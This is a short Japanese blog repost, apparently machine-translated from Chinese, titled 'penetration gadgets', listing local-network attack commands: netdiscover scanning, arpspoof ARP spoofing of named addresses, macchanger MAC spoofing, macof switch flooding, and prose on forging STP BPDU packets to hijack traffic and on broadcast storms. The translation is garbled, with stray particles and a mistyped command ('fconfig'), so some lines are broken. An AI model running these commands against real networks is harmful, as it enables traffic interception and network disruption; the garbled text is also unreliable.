ペネトレーションガジェット

1、Linuxのプローブカードの流量(NIC IP接続を見つける)、ARP放送データ伝送:netdiscover -r 172.16.1.1/24

2、LinuxのARPパケットスプーフィングネットワークカード(宛先アドレスが192.168.1.1 192.168.1.8詐欺です):arpspoof -i eth0の-t 192.168.1.1 192.168.1.8

3、スイッチ-macアドレススプーフィング

  現在のMACアドレス:macchanger -s eth0の

  ネットワークカードをオフに設定する前にします。ifconfig eth0をダウン

  メーカーに対応するMACアドレスの表示:macchanger -l

  レビューMACアドレス:macchanger -m 00:90:D1:33:33:33

  カードを開きます。fconfig eth0をアップ

macof -i eth0の:4、-macアドレスフラッディングを切り替えます

図5に示すように、スイッチ作動-stp:ループの形成を回避するために、ツリーに従って構成されたスパニングツリープロトコルネットワークトポロジ。STP、情報のスパニングツリーBPDUパケット情報発信を介して各スイッチ、偽造BPDUパケット、スイッチのポートの制御状態が動的にネットワークトポロジを変更する場合は、ネットワークトラフィックのマシンにハイジャック。

図6に示すように、スイッチ - ブロードキャストストーム:ARP、DHCPブロードキャスト、ローカルエリアネットワーク、ネットワークリソースを介して、理由があってもよい。ケーブル短絡、カードが破損しているループがある、ワーム

おすすめ

転載: www.cnblogs.com/wu-wu/p/12305923.html